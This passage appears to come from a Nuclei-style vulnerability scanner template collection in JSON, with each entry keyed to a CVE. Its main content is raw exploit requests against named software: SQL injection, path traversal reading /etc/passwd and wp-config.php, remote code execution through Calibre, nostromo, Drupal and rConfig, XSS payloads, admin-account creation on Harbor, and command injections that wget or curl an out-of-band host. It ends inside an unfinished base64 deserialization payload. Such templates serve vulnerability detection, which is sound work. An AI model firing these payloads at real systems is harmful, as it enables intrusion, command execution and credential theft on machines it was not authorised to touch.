name=\"tinv_wishlist_name\"\n\n\n------WebKitFormBoundaryNfcbSwJQX8ALWCMG\nContent-Disposition: form-data; name=\"product_type\"\n\nsimple\n------WebKitFormBoundaryNfcbSwJQX8ALWCMG\nContent-Disposition: form-data; name=\"product_id\"\n\n{{product_id}}\n------WebKitFormBoundaryNfcbSwJQX8ALWCMG\nContent-Disposition: form-data; name=\"product_variation\"\n\n0\n------WebKitFormBoundaryNfcbSwJQX8ALWCMG\nContent-Disposition: form-data; name=\"product_action\"\n\naddto\n------WebKitFormBoundaryNfcbSwJQX8ALWCMG\nContent-Disposition: form-data; name=\"redirect\"\n\n{{RootURL}}/product-category/uncategorized/\n------WebKitFormBoundaryNfcbSwJQX8ALWCMG--\n"],"extractors":[{"type":"json","part":"body","name":"share_key","internal":true,"json":[".wishlist.share_key"]}]},{"raw":["@timeout: 20s\nGET /wp-json/wc/v3/wishlist/{{share_key}}/get_products?order=,(select*from(select(sleep(6)))a)--+- HTTP/1.1\nHost: {{Hostname}}\nX-WP-Nonce: {{nonce}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6","contains(content_type, 'application/json')","contains(body, 'product_id')"],"condition":"and"}]}]},{"id":"CVE-2024-6782","info":{"name":"Calibre <= 7.14.0 Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /interface-data/books-init HTTP/1.1\nHost: {{Hostname}}\nReferer: {{RootURL}}\n"],"extractors":[{"type":"json","name":"book_ids","internal":true,"json":[".search_result.book_ids[0]"]}]},{"raw":["POST /cdb/cmd/list HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n[\n    [\"template\"],\n    \"\",\n    \"\",\n    \"\",\n    {{book_ids}},\n   \"python:def evaluate(a, b):\\n  import subprocess\\n  try:\\n    return subprocess.check_output(['cmd.exe', '/c', 'whoami'])\\n  except Exception:\\n    return subprocess.check_output(['sh', '-c', 'whoami'])\\n\"\n]\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["b'([^']+)"]},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-28995","info":{"name":"SolarWinds Serv-U - Directory Traversal","severity":"high"},"requests":[{"raw":["GET /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1\nHost: {{Hostname}}\n","GET /?InternalDir=\\..\\..\\..\\..\\etc&InternalFile=passwd HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"dsl","dsl":["contains(header, \"Serv-U\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-5932","info":{"name":"GiveWP - PHP Object Injection","severity":"critical"},"requests":[{"raw":["GET /wp-json/wp/v2/give_forms/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["\"type\":","\"guid\":"],"condition":"and","internal":true}],"extractors":[{"type":"json","part":"body","name":"value","internal":true,"json":[".[0].slug"]},{"type":"json","part":"body","name":"give-form-title","internal":true,"json":[".[0].title.rendered"]},{"type":"json","part":"body","name":"links","internal":true,"json":[".[0].link"]}]},{"raw":["GET /give/{{value}}?giveDonationFormInIframe=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["give-form-hash","give-form-id-prefix"],"condition":"and","internal":true}],"extractors":[{"type":"regex","part":"body","group":1,"name":"give-form-hash","internal":true,"regex":["name=\"give\\-form\\-hash\" value=\"([0-9a-z]+)\""]},{"type":"regex","part":"body","group":1,"name":"give-form-id-prefix","internal":true,"regex":["name=\"give\\-form\\-id\\-prefix\" value=\"([0-9-]+)\""]},{"type":"regex","part":"body","group":1,"name":"give-form-id","internal":true,"regex":["name=\"give\\-form\\-id\" value=\"([0-9]+)\""]},{"type":"regex","part":"body","group":1,"name":"give-amount","internal":true,"regex":["give\\-form\\-minimum\"\\n\\s+value=\"([0-9.]+)\"\\/>"]}]},{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\ngive-honeypot=&give-form-id-prefix={{give-form-id-prefix}}&give-form-id={{give-form-id}}&give-form-title={{give-form-title}}&give-current-url={{links}}&give-form-url={{RootURL}}&give-form-minimum={{give-amount}}&give-form-maximum=1000000&give-form-hash={{give-form-hash}}&give-price-id=custom&give-amount={{give-amount}}&give_first={{firstname}}&give_last={{lastname}}&give_email={{email}}&give_stripe_payment_method=&give-user-id=1&give_action=purchase&give-gateway=manual&give_embed_form=1&action=give_process_donation&&give_title={{payload}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["\"error_data\"","\"unknown_error\""],"condition":"and"}]}]},{"id":"CVE-2024-25669","info":{"name":"CaseAware a360inc - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.php?mid=0&usr=test%27%20draggable=true%20ondrag=alert(document.domain)%20value=%27p"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value='test' draggable=true ondrag=alert(document.domain)","CaseAware"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2000-0760","info":{"name":"Jakarta Tomcat 3.1 and 3.0 - Exposure","severity":"low"},"requests":[{"method":"GET","path":["{{BaseURL}}/examples/jsp/snp/snoop.jsp"],"matchers-condition":"and","matchers":[{"type":"word","words":["Request Information","Path info","Server name","Remote address"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2000-0114","info":{"name":"Microsoft FrontPage Extensions Check (shtml.dll)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_vti_inf.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["_vti_bin/shtml.dll"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16996","info":{"name":"Metinfo 7.0.0 beta - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["1918835981"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16278","info":{"name":"nostromo 1.9.6 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1\nHost: {{Hostname}}\n\necho\necho\ncat /etc/passwd 2>&1\n"],"matchers":[{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2019-12988","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","GET /Collector/nms/addModifyZTDProxy?ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(/bin/wget$IFShttp://{{interactsh-url}}) HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN</title>\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-3398","info":{"name":"Atlassian Confluence Download Attachments - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /dologin.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nos_username={{username}}&os_password={{password}}&login=Log%2Bin&os_destination=\n","GET /pages/createpage.action HTTP/1.1\nHost: {{Hostname}}\n","POST /plugins/drag-and-drop/upload.action?draftId={{draftID}}&filename=../../../../../../opt/atlassian/confluence/confluence/pages/{{randstr}}.jsp&size=8&mimeType=text%2Fplain&atl_token={{csrftoken}} HTTP/1.1\nHost: {{Hostname}}\n\n${{{num1}}*{{num2}}}\n","GET /pages/downloadallattachments.action?pageId={{draftID}} HTTP/1.1\nHost: {{Hostname}}\n","GET /pages/{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body_5","words":["{{result}}"]}],"extractors":[{"type":"regex","name":"csrftoken","group":1,"regex":["name=\"atlassian\\-token\" content=\"([a-z0-9]+)\"> "],"internal":true,"part":"body"},{"type":"regex","name":"draftID","group":1,"regex":["ta name=\"ajs\\-draft\\-id\" content=\"([0-9]+)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-8937","info":{"name":"HotelDruid 2.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"</script><script>alert(document.domain)</script>\"><input"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9632","info":{"name":"ESAFENET CDG - Arbitrary File Download","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/CDGServer3/ClientAjax"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"body":"command=downclientpak&InstallationPack=../WEB-INF/web.xml&forward=index.jsp\n","matchers-condition":"and","matchers":[{"type":"status","status":[200]},{"type":"word","words":["<servlet-name>CDGPermissions</servlet-name>"]}]}]},{"id":"CVE-2019-10098","info":{"name":"Apache HTTP server v2.4.0 to v2.4.39 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/http%3A%2F%2Fwww.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2019-7481","info":{"name":"SonicWall SRA 4600 VPN - SQL Injection","severity":"high"},"requests":[{"raw":["POST /cgi-bin/supportInstaller HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: identity\nUser-Agent: MSIE\nContent-Type: application/x-www-form-urlencoded\n\nfromEmailInvite=1&customerTID=unpossible'+UNION+SELECT+0,0,0,11132*379123,0,0,0,0--\n"],"matchers":[{"type":"word","part":"body","words":["4220397236"]}]}]},{"id":"CVE-2019-6340","info":{"name":"Drupal - Remote Code Execution","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/node/1?_format=hal_json"],"body":"{ \"link\": [ { \"value\": \"link\", \"options\": \"O:24:\\\"GuzzleHttp\\\\Psr7\\\\FnStream\\\":2:{s:33:\\\"\\u0000GuzzleHttp\\\\Psr7\\\\FnStream\\u0000methods\\\";a:1:{s:5:\\\"close\\\";a:2:{i:0;O:23:\\\"GuzzleHttp\\\\HandlerStack\\\":3:{s:32:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000handler\\\";s:2:\\\"id\\\";s:30:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000stack\\\";a:1:{i:0;a:1:{i:0;s:6:\\\"system\\\";}}s:31:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000cached\\\";b:0;}i:1;s:7:\\\"resolve\\\";}}s:9:\\\"_fn_close\\\";a:2:{i:0;r:4;i:1;s:7:\\\"resolve\\\";}}\" } ], \"_links\": { \"type\": { \"href\": \"http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default\" } } }","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16469","info":{"name":"Adobe Experience Manager - Expression Language Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/mnt/overlay/dam/gui/content/assets/metadataeditor.external.html?item=$%7b{{num1}}*{{num2}}%7d"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["data-formid=\"{{result}}\"","Embed Code"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-19368","info":{"name":"Rumpus FTP Web File Manager 8.2.9.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Login?!'><sVg/OnLoAD=alert`1337`//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=''><sVg/OnLoAD=alert`1337`//'>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15858","info":{"name":"WordPress Woody Ad Snippets <2.2.5 - Cross-Site Scripting/Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/insert-php/readme.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","negative":true,"words":["2.2.5"]},{"type":"word","part":"body","words":["Changelog"]},{"type":"word","part":"body","words":["Woody ad snippets"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3929","info":{"name":"Barco/AWIND OEM Presentation Platform - Remote Command Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/cgi-bin/file_transfer.cgi"],"body":"file_transfer=new&dir=%27Pa_Noteexpr%20curl%2b{{interactsh-url}}Pa_Note%27","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-7275","info":{"name":"Optergy Proton/Enterprise Building Management System - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/updating.jsp?url=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2019-16525","info":{"name":"WordPress Checklist <1.1.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/checklist/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Checklist","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15713","info":{"name":"WordPress My Calendar <= 3.1.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/my-calendar/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["My Calendar","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20933","info":{"name":"InfluxDB <1.7.6 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/query?db=db&q=SHOW%20DATABASES"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"results\":","\"name\":\"databases\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-13462","info":{"name":"Lansweeper Unauthenticated SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["~lansweeperdb~"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2019-9915","info":{"name":"GetSimple CMS 3.3.13 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /admin/index.php?redirect=https://interact.sh/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuserid={{username}}&pwd={{password}}&submitted=Login\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/"]}]}]},{"id":"CVE-2019-8442","info":{"name":"Jira - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml","{{BaseURL}}/s/{{randstr}}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<groupId>com.atlassian.jira</groupId>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12593","info":{"name":"IceWarp Mail Server <=10.4.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini","{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd"],"matchers-condition":"and","matchers":[{"type":"word","words":["[intl]","root:x:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16057","info":{"name":"D-Link DNS-320 -  Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/login_mgr.cgi?C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username="],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_all(body, \"uid=\", \"gid=\", \"pwd&id\")"],"condition":"and"}]}]},{"id":"CVE-2019-7255","info":{"name":"Linear eMerge E3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/badging/badge_template_v0.php?layout=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Template : <script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16662","info":{"name":"rConfig 3.9.2 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16097","info":{"name":"Harbor <=1.82.0 - Privilege Escalation","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/users"],"body":"{\"username\": \"testpoc\", \"has_admin_role\": true, \"password\": \"TestPoc!\", \"email\": \"testpoc@interact.sh\", \"realname\": \"poc\"}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"response","words":["username has already been used","Location: /api/users/"],"condition":"or"},{"type":"status","status":[201,409],"condition":"or"}]}]},{"id":"CVE-2019-9726","info":{"name":"Homematic CCU3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.%00./.%00./etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","bin:.*:0:0:"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9922","info":{"name":"Joomla! Harmis Messenger 1.2.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-13396","info":{"name":"FlightPath - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\ncallback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["idden' name='form_token' value='([a-z0-9]+)'>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-14205","info":{"name":"WordPress Nevma Adaptive Images <0.6.67 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11370","info":{"name":"Carel pCOWeb <B1.2.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /config/pw_snmp_done.html HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n%3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n","GET /config/pw_snmp.html HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"text/html\")","status_code_2 == 200","contains(body_2, 'value=\\\"\\\"><script>alert(document.domain)</script>\\\"></td>')"],"condition":"and"}]}]},{"id":"CVE-2019-14470","info":{"name":"WordPress UserPro 4.9.32 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/userpro/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2588","info":{"name":"Oracle Business Intelligence  - Path Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini"],"matchers-condition":"and","matchers":[{"type":"word","words":["for 16-bit app support"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12583","info":{"name":"Zyxel ZyWall UAG/USG - Account Creation Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/free_time.cgi"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["free_time_redirect.cgi?u=","&smsOnly=0"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10068","info":{"name":"Kentico CMS Insecure Deserialization Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData"],"body":"stagingTaskData=%3cSOAP-ENV%3aEnvelope%20xmlns%3axsi%3d%22http%3a//www.w3.org/2001/XMLSchema-instance%22%20xmlns%3axsd%3d%22http%3a//www.w3.org/2001/XMLSchema%22%20xmlns%3aSOAP-ENC%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%20xmlns%3aSOAP-ENV%3d%22http%3a//schemas.xmlsoap.org/soap/envelope/%22%20xmlns%3aclr%3d%22http%3a//schemas.microsoft.com/soap/encoding/clr/1.0%22%20SOAP-ENV%3aencodingStyle%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%3e%0a%20%20%3cSOAP-ENV%3aBody%3e%0a%20%20%20%20%3ca1%3aWindowsIdentity%20id%3d%22ref-1%22%20xmlns%3aa1%3d%22http%3a//schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db77a5c561934e089%22%3e%0a%20%20%20%20%20%20%3cSystem.Security.ClaimsIdentity.actor%20id%3d%22ref-2%22%20xmlns%3d%22%22%20xsi%3atype%3d%22xsd%3astring%22%3eAAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAALoXL2MgZWNobyBUVnFRQUFNQUFBQUVBQUFBLy84QUFMZ0FBQUFBQUFBQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQTZBQUFBQTRmdWc0QXRBbk5JYmdCVE0waFZHaHBjeUJ3Y205bmNtRnRJR05oYm01dmRDQmlaU0J5ZFc0Z2FXNGdSRTlUSUcxdlpHVXVEUTBLSkFBQUFBQUFBQUNUT1BEVzExbWVoZGRabm9YWFdaNkZyRVdTaGROWm5vVlVSWkNGM2xtZWhiaEdsSVhjV1o2RnVFYWFoZFJabm9YWFdaK0ZIbG1laFZSUnc0WGZXWjZGZzNxdWhmOVpub1VRWDVpRjFsbWVoVkpwWTJqWFdaNkZBQUFBQUFBQUFBQUFBQUFBQUFBQUFGQkZBQUJNQVFRQU81UnRTZ0FBQUFBQUFBQUE0QUFQQVFzQkJnQUFzQUFBQUtBQUFBQUFBQUNiaFFBQUFCQUFBQURBQUFBQUFFQUFBQkFBQUFBUUFBQUVBQUFBQUFBQUFBUUFBQUFBQUFBQUFHQUJBQUFRQUFBQUFBQUFBZ0FBQUFBQUVBQUFFQUFBQUFBUUFBQVFBQUFBQUFBQUVBQUFBQUFBQUFBQUFBQUFiTWNBQUhnQUFBQUFVQUVBeUFjQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU9EQkFBQWNBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBREFBQURnQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBTG5SbGVIUUFBQUJtcVFBQUFCQUFBQUN3QUFBQUVBQUFBQUFBQUFBQUFBQUFBQUFBSUFBQVlDNXlaR0YwWVFBQTVnOEFBQURBQUFBQUVBQUFBTUFBQUFBQUFBQUFBQUFBQUFBQUFFQUFBRUF1WkdGMFlRQUFBRnh3QUFBQTBBQUFBRUFBQUFEUUFBQUFBQUFBQUFBQUFBQUFBQUJBQUFEQUxuSnpjbU1BQUFESUJ3QUFBRkFCQUFBUUFBQUFFQUVBQUFBQUFBQUFBQUFBQUFBQVFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF